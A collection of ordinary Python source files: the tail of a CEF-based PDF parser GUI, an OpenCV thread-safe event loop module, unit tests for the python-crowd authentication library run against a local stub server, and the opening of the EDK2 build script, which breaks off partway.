<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" class="b-red" fill="#303f46" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible"/>
</svg>
</button>
<div class="sep"></div>"""
HTML_code += '<h1 class="big" id="fcount">{0} Items</h1>'.format(FCNT)
HTML_code += """<div class="left" style="
">
<button class="button" onclick="menu()">
<svg class="ico" id="bham" viewBox="0 0 24 24"><path id="mon" fill="#303f46" d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z">
</svg>
</button>
</div>
</div>
<div class="list">
<ul class="files" id="fls">"""
HTML_code += '<li class="fhead"><div class="tb-e tb1"><span>Convert</span></div><div class="tb-e"><span>Author</span></div><div class="tb-e"><span>Year</span></div><div class="tb-e tb-g"><span>File</span></div></li>'
if len(gl)<1:
HTML_code += """ <div class="splash">{}<span>{}</span></div> """.format(ico_splash, _MESSAGE[2])
else:
for g in gl:
g_f = file_name(g)
HTML_code += """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')"></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
HTML_code += """</ul>
</div>
<div id="console"></div>
</div>
<div class="settings">
<div class="pane p0">
<ul class="panels-menu">
<li class="lCore selected"><a class="icon ico-c" onclick="setPane('Core');">Core</a></li>
<li class="lKeys"><a class="icon ico-k" onclick="setPane('Keys');">Keybind</a></li>
<li class="lStruc"><a class="icon ico-s" onclick="setPane('Struc');">Structures</a></li>
<li class="lAbout"><a class="icon ico-a" onclick="setPane('About');">About</a></li>
</ul>
</div>
<div class="pane p1">
<div class="panels-content active" id="Core">
<script>
var _path = '{0}';
var _out = '{1}';""".format(wd, outF)
HTML_code += """
function reset() {
document.querySelector("input[name='path']").value = _path;
document.querySelector("input[name='out']").value = _out;
refresh(js_callback_1);
}
function save() {
var p = document.querySelector("input[name='path']").value;
var o = document.querySelector("input[name='out']").value;
if(p != _path) {
if(o != _out) {
set(js_callback_1, p, o);
setTimeout(menu, 750);
_out = o;
} else {
set(js_callback_1, p, '');
setTimeout(menu, 750);
}
_path = p;
refresh(js_callback_1);
enable();
} else {
if(o != _out) {
set(js_callback_1, '', o);
setTimeout(menu, 750);
_out = o;
refresh(js_callback_1);
enable();
} else {
//pass
}
}
}
"""
HTML_code += """</script>
<h2 class="pane-title">Core Settings</h2>
<div class="pane-block">
<span>Change core comportement</span>
</div>
<div class="pane-block">
<h4 class="small-title">Search path</h4>
<span class="muted">Folder where source file are</span>
<input class="input-text" name="path" type="text" placeholder="path" maxlength="256" value="{0}">
</div>
<div class="pane-block">
<h4 class="small-title">Output folder</h4>
<span class="muted">Folder where files will output</span>
<input class="input-text" name="out" type="text" placeholder="path" maxlength="256" value="{1}">
</div>
<div class="pane-block fixed">
<button class="button btn btn-cancel" onClick="reset();">Cancel</button>
<button class="button btn btn-save" onClick="save();">Save</button>
</div>
</div>
<div class="panels-content" id="Keys">
<h2 class="pane-title">Keybind</h2>
<div class="pane-block">
<ul class="keys"><li class="khead"><div class="tb-e"><span>Key</span></div><div class="tb-e tb-g"><span>Action</span></div></li>""".format(wd, outF)
for i in KBINDS:
HTML_code += """<li class="key">
<div class="tb-e"><span>{0}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(i, KBINDS[i])
DO_TAGS = parser.getDoTags()
XML_TAGS = parser.getXMLTags()
TXT_TAGS = parser.getTXTTags()
HTML_code += """</ul>
</div>
</div>
<div class="panels-content" id="Struc">
<h2 class="pane-title">Structures</h2>
<div class="pane-block">
<span>Pre-defined output</span>
</div>
<div class="pane-block">
<div class="markup">
<pre>
<code class="xml">
<span class="tag"><<span class="name">article</span>></span>
"""
for tag in DO_TAGS:
if tag in XML_TAGS and DO_TAGS[tag]:
HTML_code += """ <span class="tag sub"><<span class="name">{0}</span>> the {0} </<span class="name">{0}</span>></span>
""".format(XML_TAGS[tag])
HTML_code += """ <span class="tag"></<span class="name">article</span>></span>
</code>
</pre>
</div>
</div>
<div class="pane-block">
<div class="markup">
<pre>
<code class="text">
"""
for tag in DO_TAGS:
if tag in TXT_TAGS and DO_TAGS[tag]:
if(tag != '_HEADER'):
HTML_code += """ <span class="tag"><span class="name">{0}</span></span>
<span class="tag"> the {1} </span>""".format(TXT_TAGS[tag], tag[1:].lower())
else:
HTML_code += """ <span class="tag"><span class="name">{0}</span></span>""".format(TXT_TAGS[tag].strip())
HTML_code += """ </code>
</pre>
</div>
</div>
</div>"""
HTML_code += """
<div class="panels-content" id="About">
<span class="about-title">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M4 3v18h12l4-4V3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#f3f3f2" d="M2 5h8v6H2z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#f3f3f2" d="M3 6h6v3H3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<g fill="#bb2429">
<path fill="#a4b1b6" d="M5 4v1h13v10h-4v4H6v-8H5v9h10l4-4V4z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</g>
<path fill="#92999c" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#c94f53" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</svg>
PDF Parser</span>
<div class="pane-block">
<span class="about-version">{}</span>
</div>
<div class="pane-block">
<h4 class="small-title">Used libraries</h4>
<span class="muted">Python {}</span>
<span class="muted">Chrome {}</span>
<span class="muted">Pickle {}</span>
<span class="muted">CEF {}</span>
</div>
<div class="pane-block">
<h4 class="small-title">Team</h4>""".format(VERSION,'.'.join(['{}'.format(i) for i in sys.version_info]), cef.GetVersion()['chrome_version'], pickle.format_version, cef.GetVersion()['cef_version'])
for i in TEAM:
HTML_code += """<span class="muted">{}</span>""".format(i)
#<span class="muted">{}</span>
HTML_code += """</div>
</div>
</div>
<button class="button fixed" onclick="menu()">
<svg class="ico" id="bham" viewBox="0 0 24 24"><path id="mon" fill="#303f46" <path d="M6.3 5L5 6.2l5.7 5.7-5.7 5.7L6.3 19l5.7-5.7 5.7 5.7 1.4-1.4-5.7-5.7 5.7-5.7L17.7 5 12 10.6 6.3 4.9z"/>>
</path></svg>
</button>
</div>
</body>
</html>
"""
def main():
check_versions()
sys.excepthook = cef.ExceptHook
settings = {
"context_menu": {
"enabled": _DEBUG,
"navigation": False,
"print": False,
"view_source": False,
"external_browser": False,
"devtools": True,
},
# "product_version": "MyProduct/10.00",
# "user_agent": "MyAgent/20.00 MyProduct/10.00",
}
cef.Initialize(settings=settings)
browser = cef.CreateBrowserSync(url=html_to_data_uri(HTML_code),
window_title=APP_NAME)
#SetIcon("./res/pdf.ico")
set_client_handlers(browser)
set_javascript_bindings(browser)
cef.MessageLoop()
cef.Shutdown()
def html_to_data_uri(html, js_callback=None):
# This function is called in two ways:
# 1. From Python: in this case value is returned
# 2. From Javascript: in this case value cannot be returned because
# inter-process messaging is asynchronous, so must return value
# by calling js_callback.
html = html.encode("utf-8", "replace")
b64 = base64.b64encode(html).decode("utf-8", "replace")
ret = "data:text/html;base64,{data}".format(data=b64)
if js_callback:
#js_print(js_callback.GetFrame().GetBrowser(),
# "Python", "html_to_data_uri",
# "Called from Javascript. Will call Javascript callback now.")
#js_callback.Call(ret)
pass
else:
return ret
def set_javascript_bindings(browser):
external = External(browser)
bindings = cef.JavascriptBindings(
bindToFrames=False, bindToPopups=False)
bindings.SetProperty("python_property", "This property was set in Python")
bindings.SetProperty("cefpython_version", cef.GetVersion())
bindings.SetFunction("html_to_data_uri", html_to_data_uri)
bindings.SetFunction("lol", lol)
bindings.SetFunction("add_file", add_file)
bindings.SetFunction("switch_file", switch_file)
bindings.SetFunction("remove_file", remove_file)
bindings.SetFunction("parse", _parse)
bindings.SetFunction("setWD", setWD)
bindings.SetFunction("setOut", setOut)
bindings.SetFunction("set", set)
bindings.SetFunction("refresh", _refresh)
bindings.SetObject("external", external)
browser.SetJavascriptBindings(bindings)
def add_file(f):
if f not in files:
files.append(f)
def switch_file(f):
if f not in files:
files.append(f)
else:
files.remove(f)
def remove_file(f):
if f in files:
files.remove(f)
def clear_files():
files.clear()
def setWD(wd=False):
if wd != False:
files.clear()
return parser.setWD(wd)
else:
return False
def setOut(outf=False):
if outf != False:
return parser.setOut(outf)
else:
return False
def set(js_callback=None, wd='', outf=''):
#if js_callback:
# js_print(browser, "Python", "set", "{} {}".format(wd, outf))
if wd != '':
if not setWD(wd):
if js_callback:
browser = js_callback.GetFrame().GetBrowser()
js_print(browser, "Python", "set", "Invalid path : {}".format(wd))
else:
if js_callback:
_refresh(js_callback)
if outf != '':
if not setOut(outf):
if js_callback:
browser = js_callback.GetFrame().GetBrowser()
js_print(browser, "Python", "set", "Out folder invalid ({}).".format(outf))
def _refresh(js_callback=None):
gl = parser.listDir()
FCNT = len(gl)
clear_files()
parser.saveConfig()
if js_callback:
browser = js_callback.GetFrame().GetBrowser()
file_count(browser, FCNT)
html = '<li class="fhead"><div class="tb-e tb1"><span>Convert</span></div><div class="tb-e"><span>Author</span></div><div class="tb-e"><span>Year</span></div><div class="tb-e tb-g"><span>File</span></div></li>'
fls_set(browser, html)
if FCNT<1:
html = """ <div class="splash">{}<span>{}</span></div> """.format(ico_splash, _MESSAGE[2])
fls_add(browser, html)
else:
for g in gl:
g_f = file_name(g)
#TODO: PARSE
if g in files:
html = """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')" checked></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
else:
html = """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')"></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
fls_add(browser, html)
def _parse(js_callback=None, xml=True):
outF = ""
if js_callback:
html = '<li class="fhead"><div class="tb-e tb1"><span>Status</span></div><div class="tb-e"><span>Name</span></div></li>'
browser = js_callback.GetFrame().GetBrowser()
fls_set(browser, html)
for g in files:
q = queue.Queue()
try:
if xml:
t = threading.Thread(target=parser.fromTexttoXML, args=['{}'.format(g), q])
else:
t = threading.Thread(target=parser.fromTexttoTXT, args=['{}'.format(g), q])
t.start()
outF = q.get()
if(outF == ''):
html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_failed, ''.join(outF.split('/')[-1:]))
else:
html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_pdf, ''.join(outF.split('/')[-1:]))
# js_print(js_callback.GetFrame().GetBrowser(),
# "Parser", "file_load",
# "> {}".format(g))
except:
html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_failed, ''.join(outF.split('/')[-1:]))
args = [browser, html]
threading.Timer(0.5, fls_add, args).start()
def lol(str, js_callback=None):
#subprocess.Popen("gnome-terminal")
print(str)
def fls_add(browser, html):
browser.ExecuteFunction("flsAdd", html);
def fls_set(browser, html):
browser.ExecuteFunction("flsSet", html);
def file_count(browser, val):
browser.ExecuteFunction("setCount", val);
def js_print(browser, lang, event, msg):
# Execute Javascript function "js_print"
browser.ExecuteFunction("js_print", lang, event, msg)
def set_client_handlers(browser):
# client_handlers = [LoadHandler(), DisplayHandler()]
# for handler in client_handlers:
# browser.SetClientHandler(handler)
pass
def check_versions():
ver = cef.GetVersion()
class LoadHandler(object):
def OnLoadingStateChange(self, browser, is_loading, **_):
"""Called when the loading state has changed."""
if not is_loading:
# Loading is complete. DOM is ready.
# js_print(browser, "Python", "OnLoadingStateChange",
# "Loading is complete")
pass
class External(object):
def __init__(self, browser):
self.browser = browser
def test_multiple_callbacks(self, js_callback):
"""Test both javascript and python callbacks."""
# js_print(self.browser, "Python", "test_multiple_callbacks",
# "Called from Javascript. Will call Javascript callback now.")
pass
def py_callback(msg_from_js):
js_print(self.browser, "Python", "py_callback", msg_from_js)
js_callback.Call("String sent from Python", py_callback)
if __name__ == '__main__':
main()
|
cv2_eventloop.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OpenCV eventloop for thread-safe access to opencv GUI.
Makes it possible for multiple threads to interact with cv2 UI.
This gets rid of the problem here: https://github.com/opencv/opencv/issues/8407
Normally cv2 insists that the thread which invokes waitKey, must also be the
one to perform other UI operations such as imshow, namedWindow, etc.
This module frees the developer from ensuring it for a multi-threaded
application. Hence UI and waitKey can now be manipulated by two different,
independent, threads.
Example -
cv2e = cv2_threadsafe.get_instance()
# User thread 1: Get keys.
for key in cv2e.key_iterator():
print(key)
# User thread 2: Can independently get the same keys.
for key in cv2e.key_iterator():
print(key)
# User thread 3: Can modify cv UI without blocking.
cv2e.call(cv2.namedWindow, "my window")
cv2e.stop() # To stop the event loop.
NOTE: Non UI opencv methods, e.g. image manipulation etc. are safe to be called
directly without requiring this module.
"""
import collections
import threading
from typing import Any, Callable, Deque, List, Optional, Tuple
import cv2 # type: ignore # type: ignore
# How long to wait on cv2.waitKey() for the main event loop.
_CV2_EVENTLOOP_MS = 100
# Key on which the event loop will stop.
_STOP_KEY = 27 # Esc
class _KeyIterator:
"""Is really an iterator that returns keys as int's.
Used as the return type for cv2e.key_iterator().
Iteration ends when the cv2e object stops.
"""
def __init__(self,
add_key_listener: Callable[[Callable[[Optional[int]], None]],
None], stop: Callable[[], None],
timeout: Optional[float]) -> None:
"""Create the _KeyIterator.
Args:
add_key_listener: the key listener, called when a key is pressed.
stop: the stop callback, called when the loop is stopped.
timeout: timeout for each loop of the iterator.
"""
self._keys: Deque[int] = collections.deque()
self._event = threading.Event()
self._lock = threading.Lock()
self._timeout = timeout
self._stopped = False
self._stop = stop
# Use the passed function to add the key listener.
add_key_listener(self._on_key)
def _on_key(self, c: Optional[int]) -> None:
"""Called on key press.
Args:
c: the key that was pressed. None if is stopping of the iterator.
"""
if c is None:
self._stopped = True
if self._stopped:
with self._lock:
self._event.set()
return
with self._lock:
self._event.set()
assert c is not None # To appease pytype.
self._keys.append(c)
def __iter__(self) -> '_KeyIterator':
return self
def __next__(self) -> int:
while True:
try:
if not self._event.wait(self._timeout):
# Timed out.
return -1
break
except KeyboardInterrupt:
self._stop()
with self._lock:
if self._stopped:
raise StopIteration()
c = self._keys.popleft()
if not self._keys:
self._event.clear()
return c
class _SafeCv2:
"""Global thread-safe CV2 access object."""
_key_listeners: List[Callable[[Optional[int]], None]]
_command_queue: Deque[Tuple[Callable[..., None], Any, Any]]
_running: bool
_thread: threading.Thread
def __init__(self) -> None:
"""Initialize the object."""
# Methods to be called on a new key. Currently used internally for
# key_iterator(). The method gets a None when the event loop ends.
self._key_listeners = []
# OpenCV function calls to be processed.
self._command_queue = collections.deque()
# Used to request the thread to stop.
self._running = True
self._thread = threading.Thread(target=self._run)
self._thread.start()
def call(self, fn: Callable[..., None], *args: Any, **kwargs: Any) -> None:
"""Queues an opencv method to be called.
Note that the method will not be called immediately. If the args change by
the time the method is called, it will use the modified arguments.
Args:
fn: An opencv function, e.g. cv2.namedWindow
*args: Arguments to the method.
**kwargs: Keyword args.
"""
self._command_queue.append((fn, args, kwargs))
def stop(self) -> None:
"""Stop the iterators."""
self._command_queue.append((self._stop, [], {}))
def _add_key_listener(self, listener: Callable[[Optional[int]],
None]) -> None:
"""Add a key listener.
Args:
listener: the listener.
"""
if not self._running:
listener(None)
else:
self._key_listeners.append(listener)
def key_iterator(self, timeout_secs: Optional[float] = None) -> _KeyIterator:
"""Iterates keys.
Does not generate -1.
Multiple threads can use it if needed.
Args:
timeout_secs: How long to wait for key press in seconds. If None, will
wait indefinitely. Will yield -1 whenever it times out.
Returns:
the key iterator.
"""
return _KeyIterator(self._add_key_listener, self._stop, timeout_secs)
def _stop(self) -> None:
print('Stopping cv2 event loop.')
self._running = False
while self._key_listeners:
listener = self._key_listeners.pop()
listener(None)
cv2.destroyAllWindows()
def _run(self) -> None:
"""Run the openCV event loop."""
while True:
c = None
try:
c = cv2.waitKey(_CV2_EVENTLOOP_MS)
except KeyboardInterrupt:
c = _STOP_KEY
if not self._running:
break
if c != -1:
for handler in self._key_listeners:
handler(c)
while self._command_queue:
fn, args, kwargs = self._command_queue.popleft()
fn(*args, **kwargs)
if c == _STOP_KEY:
self._stop()
# Singleton instance.
_INSTANCE: Optional[_SafeCv2] = None
def get_instance() -> _SafeCv2:
"""Lazy initializes instance, and returns it."""
global _INSTANCE # pylint: disable=global-statement
if _INSTANCE is None:
_INSTANCE = _SafeCv2()
return _INSTANCE
|
unittests.py | # vim: set fileencoding=utf-8 :
# Copyright 2012 Alexander Else <aelse@else.id.au>.
#
# This file is part of the python-crowd library.
#
# python-crowd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-crowd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-crowd. If not, see <http://www.gnu.org/licenses/>.
import sys
sys.path.append('..')
import unittest
import crowd
import crowdserverstub
import requests, threading
import random, time
PORT = random.randint(8000, 8020)
print("Port {0}".format(PORT))
APP_USER = 'testapp'
APP_PASS = 'testpass'
USER = 'user1'
PASS = 'pass1'
GROUP = 'group1'
class testCrowdAuth(unittest.TestCase):
"""Test Crowd authentication"""
@classmethod
def setUpClass(cls):
cls.base_url = 'http://localhost:%d' % PORT
cls.crowd = crowd.CrowdServer(cls.base_url, APP_USER, APP_PASS)
cls.server_thread = threading.Thread(
target=crowdserverstub.run_server, args=(PORT,))
cls.server_thread.start()
crowdserverstub.add_app(APP_USER, APP_PASS)
crowdserverstub.add_user(USER, PASS)
# There is a race to start the HTTP server before
# the unit tests begin hitting it. Sleep briefly
time.sleep(0.2)
@classmethod
def tearDownClass(cls):
requests.get(cls.base_url + '/terminate')
cls.server_thread.join()
def testStubUserExists(self):
"""Check that server stub recognises user"""
result = crowdserverstub.user_exists(USER)
self.assertTrue(result)
def testStubUserDoesNotExist(self):
"""Check that server stub does not know invalid user"""
result = crowdserverstub.user_exists('fakeuser')
self.assertFalse(result)
def testStubCheckUserAuth(self):
"""Check that server stub auths our user/pass combination"""
result = crowdserverstub.check_user_auth(USER, PASS)
self.assertTrue(result)
def testCrowdObjectSSLVerifyTrue(self):
"""Check can create Crowd object with ssl_verify=True"""
c = crowd.CrowdServer("http://bogus", APP_USER, APP_PASS, ssl_verify=True)
self.assertIsInstance(c, crowd.CrowdServer)
def testCrowdObjectSSLVerifyFalse(self):
"""Check can create Crowd object with ssl_verify=False"""
c = crowd.CrowdServer("http://bogus", APP_USER, APP_PASS, ssl_verify=False)
self.assertIsInstance(c, crowd.CrowdServer)
def testAuthAppValid(self):
"""Application may authenticate with valid credentials"""
result = self.crowd.auth_ping()
self.assertTrue(result)
def testAuthAppInvalid(self):
"""Application may not authenticate with invalid credentials"""
c = crowd.CrowdServer(self.base_url, 'invalidapp', 'xxxxx')
result = c.auth_ping()
self.assertFalse(result)
def testAuthUserValid(self):
"""User may authenticate with valid credentials"""
result = self.crowd.auth_user(USER, PASS)
self.assertIsInstance(result, dict)
def testAuthUserInvalidUser(self):
"""User may not authenticate with invalid username"""
result = self.crowd.auth_user('invaliduser', 'xxxxx')
self.assertIs(result, None)
def testAuthUserInvalidPass(self):
"""User may not authenticate with invalid password"""
result = self.crowd.auth_user(USER, 'xxxxx')
self.assertIs(result, None)
def testCreateSessionValidUser(self):
"""User may create a session with valid credentials"""
result = self.crowd.get_session(USER, PASS)
self.assertIsInstance(result, dict)
def testCreateSessionInvalidUser(self):
"""User may not create a session with invalid username"""
result = self.crowd.get_session('invaliduser', 'xxxxx')
self.assertIs(result, None)
def testCreateSessionInvalidPass(self):
"""User may not create a session with invalid password"""
result = self.crowd.get_session(USER, 'xxxxx')
self.assertIs(result, None)
def testValidateSessionValidUser(self):
"""Validate a valid session token"""
session = self.crowd.get_session(USER, PASS)
token = session['token']
result = self.crowd.validate_session(token)
self.assertIsInstance(result, dict)
def testValidateSessionInvalidToken(self):
"""Detect invalid session token"""
token = '0' * 24
result = self.crowd.validate_session(token)
self.assertIs(result, None)
def testValidateSessionValidUserUTF8(self):
"""Validate that the library handles UTF-8 in fields properly"""
session = self.crowd.get_session(USER, PASS)
token = session['token']
result = self.crowd.validate_session(token)
self.assertEquals(result['user']['email'], u'%s@does.not.ëxist' % USER)
def testCreateSessionIdentical(self):
"""Sessions from same remote are identical"""
session1 = self.crowd.get_session(USER, PASS, '192.168.99.99')
session2 = self.crowd.get_session(USER, PASS, '192.168.99.99')
self.assertEqual(session1, session2)
def testCreateSessionMultiple(self):
"""User may create multiple sessions from different remote"""
session1 = self.crowd.get_session(USER, PASS, '192.168.99.99')
session2 = self.crowd.get_session(USER, PASS, '192.168.88.88')
self.assertNotEqual(session1, session2)
def testTerminateSessionValidToken(self):
"""Terminate a valid session token"""
session = self.crowd.get_session(USER, PASS)
token = session['token']
result = self.crowd.terminate_session(token)
self.assertTrue(result)
def testTerminateSessionInvalidToken(self):
token = '0' * 24
result = self.crowd.terminate_session(token)
self.assertIs(result, None)
def testGetGroupsNotEmpty(self):
crowdserverstub.add_user_to_group(USER, GROUP)
result = self.crowd.get_groups(USER)
self.assertEqual(set(result), set([GROUP]))
crowdserverstub.remove_user_from_group(USER, GROUP)
def testGetNestedGroupsNotEmpty(self):
crowdserverstub.add_user_to_group(USER, GROUP)
result = self.crowd.get_nested_groups(USER)
self.assertEqual(set(result), set([GROUP]))
crowdserverstub.remove_user_from_group(USER, GROUP)
def testRemoveUserFromGroup(self):
crowdserverstub.add_user_to_group(USER, GROUP)
crowdserverstub.remove_user_from_group(USER, GROUP)
result = self.crowd.get_groups(USER)
self.assertEqual(set(result), set([]))
def testGetNestedGroupUsersNotEmpty(self):
crowdserverstub.add_user_to_group(USER, GROUP)
result = self.crowd.get_nested_group_users(GROUP)
self.assertEqual(set(result), set([USER]))
crowdserverstub.remove_user_from_group(USER, GROUP)
def testUserExists(self):
result = self.crowd.user_exists(USER)
self.assertTrue(result)
def testUserAttributesExist(self):
result = self.crowd.get_user(USER)
self.assertIsNotNone(result)
self.assertTrue('attributes' in result)
def testUserAttributesReturned(self):
crowdserverstub.add_user('attruser', 'mypass', {'something': True})
result = self.crowd.get_user('attruser')
self.assertIsNotNone(result)
self.assertTrue('attributes' in result)
self.assertTrue('something' in result['attributes'])
def testUserCreationSuccess(self):
result = self.crowd.add_user('newuser',
email='me@test.example',
password='hello')
self.assertTrue(result)
def testUserCreationDuplicate(self):
result = self.crowd.add_user('newuser1',
email='me@test.example',
password='hello')
self.assertTrue(result)
result = self.crowd.add_user('newuser1',
email='me@test.example',
password='hello')
self.assertFalse(result)
def testUserCreationMissingPassword(self):
def f():
result = self.crowd.add_user('newuser2',
email='me@test.example')
self.assertRaisesRegexp(ValueError, "missing password", f)
def testUserCreationMissingEmail(self):
def f():
result = self.crowd.add_user('newuser',
password='something')
self.assertRaisesRegexp(ValueError, "missing email", f)
def testUserCreationInvalidParam(self):
def f():
result = self.crowd.add_user('newuser',
email='me@test.example',
password='hello',
invalid_param='bad argument')
self.assertRaisesRegexp(ValueError, "invalid argument .*", f)
if __name__ == "__main__":
unittest.main()
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
from io import BytesIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
